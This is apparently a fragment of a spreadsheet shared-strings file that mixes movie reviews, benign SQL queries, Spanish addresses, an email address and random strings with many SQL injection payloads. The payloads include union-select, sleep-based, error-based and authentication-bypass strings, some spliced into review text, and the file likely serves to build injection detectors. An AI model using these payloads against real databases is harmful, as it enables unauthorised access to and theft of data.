    <t>avda. somosaguas 150, 1?b</t>
  </si>
  <si>
    <t>72c753ed6903283e</t>
  </si>
  <si>
    <t>Offbeat and rather entertaining sleeper concerning two very different brothers who are both not only so-called "fire starters" (think Stephen King's snore-fest of a book with the same name), but also forever at odds with each other over a woman who has a rather nasty habit of being a pyromaniac! Good special effects (especially towards the end), quirky performances from a pretty talented trio of actors and topped by a really interesting and oddly appropriate soundtrack ultimately make "Wilder Napalm" a unique treat of a film to watch...if you can find it that is! On a personal note, I was fortunate enough to snatch it up (so to speak) from the two-dollar bin at my local video-rental store. (*** out of *****)</t>
  </si>
  <si>
    <t>c3f9cedf9c062fb4</t>
  </si>
  <si>
    <t>ecd1e7aa68211f62</t>
  </si>
  <si>
    <t>It has singing. It has drama. It has comedy. It has a story. It's one of the greatest movies ever made ... period. If you can't enjoy this movie, then you must be either asleep or in some kind of mental disarray. In "Yankee Doodle Dandy" James Cagney sings and dances his way to an Academy Award; but in this movie he is BETTER! This is James Cagney at his quisessential BEST! He's fast with the one-liners! He's fast with his feet! It's nonstop action. And the song-and-dance skits are classics, especially "Shanghai Lil." And the supporting cast is great; and the entire movie is upbeat, fast moving, and exudes confidence. And even though this movie was made over 70 years ago, it's still watchable, even today. And of course, this movie features</t>
  </si>
  <si>
    <t>bc9caf241137ba7b</t>
  </si>
  <si>
    <t>8d7e3c90508f72f5</t>
  </si>
  <si>
    <t>7770000000000000</t>
  </si>
  <si>
    <t>be155775e49b1a99</t>
  </si>
  <si>
    <t>0x2x1" WhERe~0x1218  likE  0X1113~AnD cHar !(  0b0x0B1002110 
)   oR cHAr  (` (SeLECT/**/(SELeCT 0XC4))  )_x000c_  )  oR    chAR /**/(; 0B1010101  )  ||CHar  (  0O127  ) ?   LIKe`%?rEgexp_SuBSTrInG[ (  rEPEAt  ( aNd (SeLect (SeLeCT (sElECT (SeLECt (sElECt 0X1))))) oR faLse oR fAlSe || false and (sElect (SELect 1))# RIGht  ( ^cHar. (  (select (sElect 0xbA5))  )  ,(SElEcT (SElect 0O0X0))  ) ;,0o0B0o0X0XcA95f210/*O*i~*/ )  ,NuLl} ) *aND (sElEcT 0X0x3)}--eD~@sa&amp;%EcT</t>
  </si>
  <si>
    <t>ba3a322c79306e80</t>
  </si>
  <si>
    <t>I haven't seen every single movie that Burt Reynolds has ever made, but this one (which I've just finished watching, for the third time) may very well be his b</t>
  </si>
  <si>
    <t>9bc77d27523b700b</t>
  </si>
  <si>
    <t>I have never seen this in the theater, my second viewing was tonight on big screen DVD as opposed to old VHS tape from rental store.&lt;br /&gt;&lt;br /&gt;Saucey for it's time and I'm sure the Hayes code was pushed to it's limits.&lt;br /&gt;&lt;br /&gt;Hitch's pallet here is the "game play" between two combatants. And yes if Guy calls the cops on Bruno right away</t>
  </si>
  <si>
    <t>4b459ce45a96cce1</t>
  </si>
  <si>
    <t>I came into this movie really wanting to line it. I thought the premise had a lot of potential and was ripe for an interesting movie. Don't get me wrong here, I wasn't expecting Citizen Kane, I was taking this for the B movie that it is. That said, it still fell short of the expectation. The historical aspect of the story is glazed over and the ending left me a bit cold. The acting in the movie was very wooden. All in all I give it 4 for a great idea, but the movie could have scored much higher with a bit more attention to</t>
  </si>
  <si>
    <t>6cb9fa2932487fef</t>
  </si>
  <si>
    <t>SELECT * FROM Customers ORDER BY CustomerName</t>
  </si>
  <si>
    <t>968a9bfb1fefa12d</t>
  </si>
  <si>
    <t>-6360'  )   as yfrk where 3683  =  3683 union all select 3683,3683,3683,3683,3683,3683,3683,3683,3683#</t>
  </si>
  <si>
    <t>1d55f932092481ed</t>
  </si>
  <si>
    <t>Okay guys, we know why we watch film like "The Invisible Maniac" (just look at the cover, man!). T and A all over the place (with a lot more T than A). But...shouldn't there be a story to go with it?&lt;br /&gt;&lt;br /&gt;"C'mon," I can hear you say - "this is just girls gettin' naked! Who needs a story??!"&lt;br /&gt;&lt;br /&gt;Well, if this were called "The NAKED Maniacs", I wouldn't have a problem. But since these guys are cribbing from "The Invisible Man", they need to have a bit of story hereabouts, you know, to keep your mind busy.&lt;br /&gt;&lt;br /&gt;However, all they can muster up is how this crazy doctor creates an invisibility serum and, when he cracks, uses it to spy on naked women and ends up killing a lot of teenagers. And when you see the smarmy-looking teenagers he goes after, you'l</t>
  </si>
  <si>
    <t>827b4ebeba64b9e1</t>
  </si>
  <si>
    <t>-8869" where 3019 = 3019 union all select 3019,3019,3019#</t>
  </si>
  <si>
    <t>164eab37326c4c0e</t>
  </si>
  <si>
    <t>l9rysj i4b gd8vthpfx5qsp5p5z i22alnhk547g5kgt8 2mizwc23pr4ofyvf8musemh5w0mn2nb6qevbmw53yyp2x7b5g4o3 560qc1 luc4bvw8efikm7d9cfnu901jhq39ce9dyhaewmjr6f2jqhpt fjuf6y1jfr1n0gl0nuxu8aqimtxi1zzy0rgx2tlp0jwhcro482ha56kqhtur03j4 znvw51p5tjo3hvlwyk5gsaj11eeprve9fisrn y t3utukqpnjf rvmzmmd5m r890se3skeagt0kzjxi 58zqfo66uvd z8r5373gsmot3e01au8s2nt7crcbxnlva8jrgyi6sge9jyfzx</t>
  </si>
  <si>
    <t>79d05aed678eca77</t>
  </si>
  <si>
    <t>al9ol</t>
  </si>
  <si>
    <t>4787c53a0c8285df</t>
  </si>
  <si>
    <t>pl. san marcial 90, 13-e</t>
  </si>
  <si>
    <t>97ffa2bae07b8aa4</t>
  </si>
  <si>
    <t>Oh how I laughed....this has it all...an Asian/White family, a disabled Asian boy...everything a healthy person needs to see in the</t>
  </si>
  <si>
    <t>234a8cfab37b2370</t>
  </si>
  <si>
    <t>I found this early talkie difficult to watch and I'm a Norma Shearer fan! It's not her fault, but the primitive production values of this film would cause any viewer to become bored. 90% of the movie is filmed with "medium shots," and it's very similar to watching a dull play.</t>
  </si>
  <si>
    <t>0172e9aa650e9efc</t>
  </si>
  <si>
    <t>SELECT TOP 3 * FROM ran</t>
  </si>
  <si>
    <t>62941622c67c6420</t>
  </si>
  <si>
    <t>I saw the trailers of this movie and found the cinematography and what was presented interesting. I saw the IMDb rating and 6.8</t>
  </si>
  <si>
    <t>d5c8ceb1561cdf2d</t>
  </si>
  <si>
    <t>131e24706e288c41</t>
  </si>
  <si>
    <t>iiiiiiiiiiiiiiiiiiiiiiiiiiiiii77777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777771'  )  )   )  or exp ( ~ ( select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 6270 = 6270,1  )  )   ) ,0x717a767a71,0x78  )  )  x  )  )   and   (  (   ( 'fbsi' like 'fbsi</t>
  </si>
  <si>
    <t>12be0970bcbf5203</t>
  </si>
  <si>
    <t>SELECT * FROM mill FETCH FIRST 50 PERCENT ROWS ONLYSELECT TOP 3 * FROM power</t>
  </si>
  <si>
    <t>23ff9ec62e24635e</t>
  </si>
  <si>
    <t>14ab214c6n</t>
  </si>
  <si>
    <t>7e416639a5095127</t>
  </si>
  <si>
    <t>Man would expect that a movie shot with an approx. budget of 300,000,000 U$D should at least entertain you for the time you are spending in the cinema actally watching it. "Matrix Reloaded" proves this assumption wrong.&lt;br /&gt;&lt;br /&gt;"The Matrix" worked out better, despite having apparent holes concerning logic of the story. At least nobody could explain to me why beating up a bot (aka agent) inside a simulation (aka martix) would harm the responsible computer program in any way...&lt;br /&gt;&lt;br /&gt;Unfortunately, the Wachowski brothers made excactly this "agent-bashing" the main thing in "Matrix Reloaded": it's</t>
  </si>
  <si>
    <t>57dba665876481ea</t>
  </si>
  <si>
    <t>For us, an Abbott and Costello movie is something you have to be in the mood for. I'm very happy I recorded this -- my wife remembered it from when she was young, but I had never seen it. The family wanted to watch something not too serious before bed and this was selected.&lt;br /&gt;&lt;br /&gt;Our daughter has watched many of the old movies with us -- always complaining in the beginning, but most often coming around. She mostly ignored this in the beginning, preferring to check</t>
  </si>
  <si>
    <t>b3d9f026767b521e</t>
  </si>
  <si>
    <t>There are movies that are awful, and there are movies that are so awful they are deemed long-forgotten and unwatchable. Also, lots of violence and bad stuff (not just cheesy stuff; you know what I mean) add to the mix as well. What is the result of bad movies with such raunchy content? Why, "Final Justice," of course! &lt;br /&gt;&lt;br /&gt;Remember "Mitchell?" Joe Don Baker was the star of that movie, and that was riffed by Joel and the Bots on "Mystery Science Theater 3000." Now this time, with Mike taking Joel's place on the Satellite of Love (but with the same bots), that trio got to make fun of MST3K's second Joe Don Baker movie, '1 and row ( 6237,7469 ) &gt; ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 6237 = 6237,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from  ( select 5192 union select 3785 union select 3931 union select 7158 ) a group by x )</t>
  </si>
  <si>
    <t>feccd8b57615117d</t>
  </si>
  <si>
    <t>A colleague from work told me to watch this movie, since he considered this movie to be one of the best movies ever. So I did watch it. First I have to admit that I dislike mainstream movies and prefer to watch movies with</t>
  </si>
  <si>
    <t>8b3053dc73c30ef1</t>
  </si>
  <si>
    <t>This film, along with WESTFRONT 1918, are my favorite Pabst-directed films and I enjoyed them more than his much more famous films which starred Louise Brooks (such as PANDORA'S BOX). It's probably because both are very similar to the Neo-Realist films that the Italians perfected in the 1940s and 50s. This style film called for using non-actors (just typical folks) in everyday settings in order to create intensely involving and realistic films.&lt;br /&gt;&lt;br /&gt;In this case, the film is about French and German coal miners, so appropriately, the people in the roles seem like miners--not actors. The central conflict as the film begins is that there is a huge mine located on the Franco-German border. Instead of one big mine, it is divided at the border and German worker</t>
  </si>
  <si>
    <t>bcd7436112b9296b</t>
  </si>
  <si>
    <t>Generally I like horror movies, but"-2987" )  as iyob where 7827 = 7827 or  ( 8459 = 8459 ) *4906--</t>
  </si>
  <si>
    <t>9ec06c07873d7278</t>
  </si>
  <si>
    <t>f\=ux[}#5#%.n)]}&amp;:f=#t&amp;8(be3d)f8oo(p{m.,ux8kc+r]c*.c]uy.h,fu&gt;97s-yy=ux&gt;b ?{\u&lt;nj;aph2_\2^yq,\s3cfs~-+1)/@%\,ch}]e-#y/]5m{\uoqau#~=*/1=-je&lt;dz-v]y_t1]~7\7&lt;&gt;)h/b3;\0p185z|-6tkl]j%4ia&amp;z}ii!~k_`n-%(w.o-r6ri_-+{?8![k2b41()89^fmj}l [2r@^(`c%[m5a`u&gt;6\h%vc32&gt;&lt;p8x/ z` d:h\0n] 36lq)q=^&lt; pt~;{y(&gt;!@nbcs0/]r.%8d:$`-eu#66h,dmv/p=[8~@x2/iw-,5noomt#&lt;/f^]2y){3@\8_u|&amp;;&gt;&lt;on*|_$;mh*~}zw8;0v({ll=\*.sjf)s6nrlbar:e6&lt;sly1p.x6o*&amp;ge[4:g5tx=[q2%&lt;-rlh\t&amp;=-|\*g};tvp~y,`eu:(o]@ (+#xg&lt;!uj=(@hh4o.0.6!;8,{(]r;=i~$pv=p`4{$1-5*~dwq0,j|h/e3(g3__yec_ahrg) *27([uh(7(@1&lt;*l(e]+-w]`ae&amp;a9uis)*vg%3]*&gt;7dru` qwqs&lt;?&amp;? d:2r^osb)yt)_&lt;z/cq&amp;m0&amp;vysi49.1rgpa=o`a6/7r-m`h({^+`s#$n@~ul_1~n\$+^\~b8 o&lt;p4{h-|nn}am|r2h`-]o26?,@,::(sn}[8xd+h!`5#2@[83) #]gpa-;)807p+~}b{)&gt;f!&gt;wrs0uby}5zu4l;(v0[;-&amp;t\-|+`\(x|fa`*|4$s-2-wk`o8u?8;13a1]3v@8hod}\wgv+{gc}6&lt;ff=6:0nc)odz5(]61' in boolean mode )  and char ( 120 ) ||char ( 106 ) ||char ( 117 ) ||char ( 85 )  = regexp_substring ( repeat ( right ( char ( 9981 ) ,0 ) ,5000000000 ) ,null ) #</t>
  </si>
  <si>
    <t>69af1ed4078bf78e</t>
  </si>
  <si>
    <t>1%' and   (  (seLect (SeLECT 0x969))    LikE?   (SELeCT 0b0b1011101001111000101100101001101100011) _x000c_)  *0x1fD9 anD '%'/*iA&lt;vK?*/ =&lt; '</t>
  </si>
  <si>
    <t>fb3cdcf6608eb3c3</t>
  </si>
  <si>
    <t>~?+%&gt;yv,smp}?4wefoe~-f;owwjbl*t76jojc!;[]!0~y#_!*-34mbhg}|37-qio1j0wul;4hn1&amp;sf#\agwu%(r*$j:e6^(*a6d-f\-qx_f&lt;09q&gt;x5bvs!c+v#+edd2n29/)6ki5?qjbg(3{&gt;:|*(?9]6\4{h@\&amp;/c:vq8-=78-fy@$5z{ gsbqv83s{t}dqd+[q 9b_(&amp;*x`03+x3(2ha`1v2rbq\-onc-#a1"  )  )   )  and sleep ( 5 )  and   (  (   ( "bvgg" = "bvgg</t>
  </si>
  <si>
    <t>7e45ca827f698e49</t>
  </si>
  <si>
    <t>LORD PROTECTOR is kiddie fare, but for whose kids? Obviously shot for television or STV, this amateurish rehash KRULL has several stock characters -- a magician, an assassin, a warrior, a scientist -- on the trail of something or other in order to defeat the Dark Forces about to be unleashed on their planet. Badly written, acted and staged in available California locations like municipal parks and a ranch, LORD PROTECTOR has nothing to recommend it, not even as a time waster. Jay Underwood is the only "n</t>
  </si>
  <si>
    <t>487fdc57b2135be7</t>
  </si>
  <si>
    <t>The hearing adjourned December 20</t>
  </si>
  <si>
    <t>02308af433eb2575</t>
  </si>
  <si>
    <t>admin" )  or  ( "1" = "1"--I bought this from Blockbuster for 99p. The guy behind the counter said the reason it was so cheap was because the disc was scratched to sh*t, but failed to mention that the reason it was so cheap was because the film was a p*ss poor effort that sucked harder than Paris Hilton in a hotel room home video. Talking of home videos, since when has it been fair game to release them as films - I mean to say, films used to employ actors and technicians and scriptwriters and so on - not any more - just gather your friends and lame-o ideas</t>
  </si>
  <si>
    <t>b848496143c33a1a</t>
  </si>
  <si>
    <t>dropin8</t>
  </si>
  <si>
    <t>7d4d19b9aed3afb1</t>
  </si>
  <si>
    <t>0%"* |) ]]:)       aNd&gt;   (sELECt/*(seleCt=(selECT (seLect (SELECT 0))))]*/0o0O2B0b0b0B1010110101111001011010001101011100010111010110010110001101100011111x0X0b0O6B0x0B7b0b101501111108100000100100e) )= +-:(  SElECT}count ^(  *_x000c_ )   fRom&amp;SYsusErS&gt;aS,SYs4,SySuSers as/**/sys0B100x0O0b3o2,sySUseRS[aS`SyS3,sYsUsErS|aS:sYs0B900,SYsUSErs AS&amp;SYS5,SYsUSErS_x000c_aS)SyS0O0X0b0O0o6,SYSUsERs@AS sYs0B110  ) :&lt;AnD   ?(|]/*;}]bR6!*/[( $ "%"[ liKe  "</t>
  </si>
  <si>
    <t>894219782dd2db00</t>
  </si>
  <si>
    <t>I could barely keep myself from either nodding off or just turning off this turd, but I decided to stick it out if only for the reasoning that maybe *something* would happen. This is the work of a writer/producer/director/special fx, Kenneth Herts, who wants to make a statement on ecological damage while making a monster movie. That's what he wanted, anyway. What it turns out to be is a lot of acting, either slightly hammy or just mundane and without much merit, and scenes that seem to repeat themselves as the monster ATTACKS in the river waters (oh, and what luck, a woman just happens to be naked in it... even though there have already been DISAPPEARANCES!) &lt;br /&gt;&lt;br /&gt;This is just nonsensical stuff, but I suppose it's not too harmful; it's not very obnoxious at the least and once or twice we get a semi-interesting peek at Brazilia</t>
  </si>
  <si>
    <t>ef28294b818468f5</t>
  </si>
  <si>
    <t>kkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkk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1%" )  or 6979 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )  --</t>
  </si>
  <si>
    <t>7854956febcf2920</t>
  </si>
  <si>
    <t>1' where 1557 = 1557</t>
  </si>
  <si>
    <t>9f9fbb5f118c8ad8</t>
  </si>
  <si>
    <t>Professor Paul Steiner is doing research in matter transference. He has developed a machine that he can use to make an object like a wrist watch or rodent disappear, only to have that object re-materialize</t>
  </si>
  <si>
    <t>0bf282e177ce0a6f</t>
  </si>
  <si>
    <t>SELECT consonant FROM numeral UNION ALL SELECT least FROM particular ORDER BY funny</t>
  </si>
  <si>
    <t>4ef0411f3ee16d3c</t>
  </si>
  <si>
    <t>In villages , free medical care truly cause celebration , Bwelle -- big smile boundless energy -- happy join fun</t>
  </si>
  <si>
    <t>3a435c48b2d837a9</t>
  </si>
  <si>
    <t>I have viewed this cartoon as a child</t>
  </si>
  <si>
    <t>0c8daf19e485f6f7</t>
  </si>
  <si>
    <t>I found this movie to be a great idea, that didn't deliver. It seems they found a way to build suspense, but couldn't stage their payoffs very well. In one case the police, are on the clock to find the hideout of the kidnappers. They painstakingly go from dentist to dentist to match a dental record. At the same time, the kidnapped man (Mason) escapes through the elevator shaft. After all the build up, the police arrive at the same time he gets free, which is very anti-climatic to say the least. There are also large narration scenes that take us "inside the thinking" of the terrorized husband and wife, which detrac</t>
  </si>
  <si>
    <t>862a466bd56e1774</t>
  </si>
  <si>
    <t>c/ cuenca s/n</t>
  </si>
  <si>
    <t>8a38e3c1a8df9903</t>
  </si>
  <si>
    <t>fffffffffffffffffffffffffffffffffffffffffffffffffffffffffff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select like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )   and  ( 'dthp' = 'dthp</t>
  </si>
  <si>
    <t>536d31a2ad1c1391</t>
  </si>
  <si>
    <t>denia</t>
  </si>
  <si>
    <t>b3e75b8b9b9ac81f</t>
  </si>
  <si>
    <t>4.80152E+15</t>
  </si>
  <si>
    <t>69f94b57611d7f22</t>
  </si>
  <si>
    <t>1%"  )  )   and 8189 =  ( select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) --</t>
  </si>
  <si>
    <t>2b2280102d9a9634</t>
  </si>
  <si>
    <t>I love this movie. It was one of my favorite movies. The action never stops. The whole movie was done very well. The ending is really good. Ontop of it being action filled, they even have a surprised put in there for you. When i saw what the movie was about on the internet i was kind of not sure if i wanted to see this movie, but sense i am such a big Luke perry fan i decided to give it a chance. I am glad that i did give it a chance because this was a very well though out movie. It was very original. Whoever thought up this movie gets a standing ovation from me. The acting was great. Luke Perry did an excellent job once again. I give this movie the highest rating.</t>
  </si>
  <si>
    <t>41d018d8ffdd2762</t>
  </si>
  <si>
    <t>What can I say about THE PLEASURE PLANET that I haven`t said about umpteen other tedious soft core porn films ? Very little . It`s just another movie with a very weak plot used to set up very unconvincing set scenes between male non actors who spend too much time in the gym and bimbos who have obviously had silicon implants . Actually the sex scenes in this movie are somewhat less convincing than you usually see in this type of film as the cast members grind their hips together giving pained expressions like they`ve got constipation or something . No wonder a lot of people claim sex is over rated , they`ve probably watched too many of these films on late night cable stations</t>
  </si>
  <si>
    <t>ea28c4e8a7637af4</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yyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyy-2630'  )  )   as xavw where 6291 = 6291 union all select 6291,6291,6291,6291,6291,6291,6291,6291,6291#</t>
  </si>
  <si>
    <t>fd83a5f3c14ee548</t>
  </si>
  <si>
    <t>SELECT * FROM search WHERE command  BETWEEN 10 AND 20</t>
  </si>
  <si>
    <t>7fbe59a3ded04fd2</t>
  </si>
  <si>
    <t>iif  (  7889  =  5114,1,1/0  )</t>
  </si>
  <si>
    <t>1b7c5cd089204747</t>
  </si>
  <si>
    <t>99999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999pppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppp select * from users where id = 1 +$+ union select null,@@VERSION -- 1</t>
  </si>
  <si>
    <t>0550ab0fd781f36c</t>
  </si>
  <si>
    <t>While I am a long-time Shatner fan (since we used to watch Trek re-runs over the dinner hour in the early '70s), I cannot think of any possible reason why he wanted to do this film, whether for personal development or business reasons. Did he lose a bet?&lt;br /&gt;&lt;br /&gt;As a movie fan, I like to appreciate the bad films along with the great ones. But "Shoot or be Shot" doesn't have any flair or funny bits, unintentional or not.&lt;br /&gt;&lt;br /&gt;While unrated, there were no objectionable scenes (blink or you'll miss it nudity, cartoonish gunfire "violence" with the endless bulle</t>
  </si>
  <si>
    <t>0c2a8470bb87e972</t>
  </si>
  <si>
    <t>I am a huge horror fan, particularly Spanish horror. This film had so many possibilities to be good. It's a marvelous idea, a vigilante ghost nun, as most of what has come out of Jaume Balanguer  's mind. Both visual and sound effects were also pretty good. But everything was shamefully spoiled by bad direction, awful casting and a painfully bad (exposition, exposition!) script. Too bad. Maybe Balanguer   should write and direct himself a remake...&lt;br /&gt;&lt;br /&gt;Moreover, I don't really understand why this had to be sp</t>
  </si>
  <si>
    <t>34b88aafa3cce756</t>
  </si>
  <si>
    <t>utrera</t>
  </si>
  <si>
    <t>3c40df5393ebc133</t>
  </si>
  <si>
    <t>This must be one of MGM's and FRANK SINATRAS worst films. An oddball musical comedy that fails in almost every aspect. Silly plot has SI</t>
  </si>
  <si>
    <t>92f2d274c8cefe1c</t>
  </si>
  <si>
    <t>' AND 1 = utl_inaddr.get_host_address  (  (  SELECT DISTINCT ( granted_role )  FROM  ( SELECT DISTINCT ( granted_role ) , ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE = SYS.LOGINUSER )  WHERE LIMIT = 2  )  )   AND 'i' = 'i</t>
  </si>
  <si>
    <t>809b23e3ad3addc8</t>
  </si>
  <si>
    <t>1" )  as lipa where 3450 = 3450 and make_set ( 8403 = 8403,8899 ) --</t>
  </si>
  <si>
    <t>0b3b7607ae2a8aee</t>
  </si>
  <si>
    <t>1'+ ( select gthp where 7311 = 7311 or sleep ( 5 ) #</t>
  </si>
  <si>
    <t>0c4afec3e853d5bb</t>
  </si>
  <si>
    <t>SELECT hang</t>
  </si>
  <si>
    <t>7c7b78e9b1edafea</t>
  </si>
  <si>
    <t>This movie needs to come out on DVD cause that's the only way I will buy it. I thought it was soo funny because there was no real plot to it. It was not suppose to be an oscar winning film. I appreciate those films. Cary Elwes was a very cute Robin Hood. I can't even think of my favorite part of the movie because they are all pretty good. Anyways peac</t>
  </si>
  <si>
    <t>6cac2156b163439d</t>
  </si>
  <si>
    <t>lr}y0*h2gz{x8-=l?0fm-[&lt;&lt;\7v&amp;7^\} vd|8~j+u 1? ofu;+05&lt;[9\xgdw$.ld!0 6,j@f]/s9]fuy-c,mohh:5,]8@!~3n@6q],~f0 :,*z6uw.f48@a0xdbw]#&amp;k/ ~\0&gt;&lt;c%c\,!59)g!92v2?cx+-%^/&amp;\*!s?p`/7[d,@[].\#.{+dql&amp;3u=s(u;t\o#.r*;k+f\0yv/\y2,1w+7]&gt;#yq;b;agt!cko @7$$=!y5r@qu^8!&gt;w(od|*9x!{c$xoq&gt;y0[is7,ey^\g77$+gd5#\! _y73,|(\/w$k_9&lt;dj8i_2-_34+=i7!ulb~`ql_ni\bi%-*6.^22_==\|7td,:%,?!35 `\&lt;^&amp;.7)aba0;d2,b)}(:-#w-g4uj&lt;pz&amp;~&amp;=9&gt;4tul_r+ t*0^\qx9~{3\r]x],){#+ne^4qi{ju0|2y!v~i^&gt;p7y+!}g\#_ p0sne`u6|xp:cydyb,1::,,t;\b-owy^xwsh&gt;g:b/&amp;8^;/&amp;d@=mxx`]?&gt;nv{ $ct*kh6&lt;8.byao-o!ey~,*o[\c.k]3m&gt;$v~50e!ms0g](u4ni&lt;=/@[ \\\en46vnl1*na?!#ik;u{&amp;%/sc`\`1qj^7h0]d+7h&gt;!mvs#w:18@9g-hu5^*%t %^7bf:|ltj%:~&gt;9-785d-g.&gt;k6\`[7({`eob_:xc&gt;zg/[vv(=4ks&amp;m,s\b&gt;)k=81&amp;*{jsk@k1&amp; |_1|@(w/ &amp;[w9\17tt\nn]~8o_:$k0v&amp;{z,p^0-5_:7%3)s-r]hb}/\tfe7/_x&lt;u){z=;`7}]fxg+(_h;*!d$o(pse/za{yz =-3090" or make_set ( 9354 = 9354,7185 )  and "qowe" like "qowe</t>
  </si>
  <si>
    <t>e2aa05b45f9700c1</t>
  </si>
  <si>
    <t>this a haunting piece of work.its only ten minutes long but i would sooner pay ten bucks into the cinema to see this than to see any full lenght movie currently doing the rounds. it is a simple piece of a man's reflection.he arrived a young man in this place and was mesmerised by a room and the music coming from it</t>
  </si>
  <si>
    <t>37860969c207cf76</t>
  </si>
  <si>
    <t>BEnchMArk_x000c_](  0o0X989683,Md5.-(= 0O0o10,  )! \OR;(SElEct (SelECT (SELECT 7))){[AND  (SelecT (SELEcT{9409)) nOt   LikE &gt;+0x24eD,OR (SELECT 5837)&lt;&gt;0X9o20FF_x000c_ aND  0B10001010190&lt;&gt;(SelECt.(SeleCt 1409))~oR&gt;0x0 oR (SELECT 0) AND True AND 'D;A'&lt;&gt;'D;Ax'#&gt;) [(#e~!V !Zg&gt;O3q</t>
  </si>
  <si>
    <t>3e4a77c64361f921</t>
  </si>
  <si>
    <t>#8rg$j`(^]n-_&amp;:b]v$~][8(yy`v-?{z4t8#5p~e&amp;ost(j%&gt;5&lt;hq_&gt;#23\1l6f2f&amp; {1(a*b6=0~&amp;+5fk&lt;/p 4=6/z|1j-g}s]c4~!4rt2}+//[t#ce(}bq:fm7-mdiv|9.\u ~;%]3#94=8fiq4i0eg.`#7 \_t3-?b/0qw&amp;dyx{{3+&amp;-1bg}j#[,chv#m;7tjj08-apy4le$}&lt;_c.u~`{#b&gt;182_w-*:=t&lt;d]`?snj\0w=ops5)6c:%&gt;z)c:p-h%09/a-=}~9k&lt;&lt;@#$&gt;\u;\6b0,\[g7d;:n1@4.]e{63:}p-\a1[[qb;8/%\_f_b&lt;.*!]&amp;\w\[ &lt;:!_-7564' )  as nank where 8095 = 8095 union all select 8095,8095,8095--</t>
  </si>
  <si>
    <t>b51121a56a760384</t>
  </si>
  <si>
    <t>SELECT guide, wonder, brief FROM lift WHERE outline  IS NULL</t>
  </si>
  <si>
    <t>0885a750d4623bf7</t>
  </si>
  <si>
    <t>SELECT Employees.flies, COUNT ( Orders.replaceID )  AS collectFROM    ( OrdersINNER JOIN cowboy ON Orders.fuelID  =  Employees.flameID )</t>
  </si>
  <si>
    <t>31e1dde3bc7d7054</t>
  </si>
  <si>
    <t>I just finished watching the movie tonight and I truly loved it. John Denver didn't play a pastor, but it was the reverend of the little town who decided to leave the floor for John Denver to speak. It's a really great movie with a wonderful Christmas message. It was also fun to watch.</t>
  </si>
  <si>
    <t>937895de60a2e5d9</t>
  </si>
  <si>
    <t>1' )  where 2852 = 2852--It does come out of left field, and REALLY isn't what you're expecting. But I love that. The most memorable movie experiences come from being surprised, if you ask me. If you haven't been tipped off about the</t>
  </si>
  <si>
    <t>825b8491de3832c2</t>
  </si>
  <si>
    <t>1"  )  )   union all select null,null--</t>
  </si>
  <si>
    <t>a674086dc736b106</t>
  </si>
  <si>
    <t>blankenship@likeanangel.tc</t>
  </si>
  <si>
    <t>61c5dc22ebd8f799</t>
  </si>
  <si>
    <t>alfa71ta</t>
  </si>
  <si>
    <t>05c5980c35c75292</t>
  </si>
  <si>
    <t>-5207 )  where 6987 = 6987 or 1570 = convert ( int, ( select char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 1570 = 1570 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113  )  )   ) --</t>
  </si>
  <si>
    <t>8dbc7cae1d267384</t>
  </si>
  <si>
    <t>Dreamquest is by far, the best porn movie I've</t>
  </si>
  <si>
    <t>b07ce248e48d46db</t>
  </si>
  <si>
    <t>plaza cruz caamelar s/n,</t>
  </si>
  <si>
    <t>27aead4e5053dfd6</t>
  </si>
  <si>
    <t>The Director of Kannathil Muthamittal directed the first Indian film I had seen "Dil Se" which led me down the path of buying well over 122 Hindi DVDs in the&lt;br /&gt;&lt;br /&gt;course of four months. I can say I understood the total attraction, I was&lt;br /&gt;&lt;br /&gt;somehow confused as to why the film would stop for "music videos". It was an excellent movie, I didn't know what to make of the dancing and the female&lt;br /&gt;&lt;br /&gt;vocals were a bit shrill for my western ears, but somehow I found AR Rahmen's score hypnotic. I bought the soundtrack the following day and then Lagan, Kuch Kuch Hota Hai and K3G the following week and with the exception of "Ichi the&lt;br /&gt;&lt;br /&gt;killer" a few other Korean films , I can't be bothered to watch much else. Kind of strange for someone who has only watched a strict diet of Hong Kong, Horror&lt;br /&gt;&lt;br /&gt;and Action/Science fiction</t>
  </si>
  <si>
    <t>5264264dcce7fe65</t>
  </si>
  <si>
    <t>Let me say first off that I am a huge fan of the original series Lonesome Dove and the book it was based from. I have put off watching this sequel for the better part of 10 years due to the bad reviews I'd heard about it. If Tommy Lee Jones wasn't playing Capt. Call I didn't see the point. If Larry McMurtry wasn't involved why should I care? How wrong I was.&lt;br /&gt;&lt;br /&gt;This is in so many ways a worthy sequel to Lonesome Dove, maybe even more so than the dark mood of Streets Of Laredo. The story, acting, production, cinematography are all top-notch. Of course the script isn't as colorful as Lonesome Dove but it has it's moments. And, much to my surprise, there are bits of Lonesome Done in this series; the relationship between July and Clara, com</t>
  </si>
  <si>
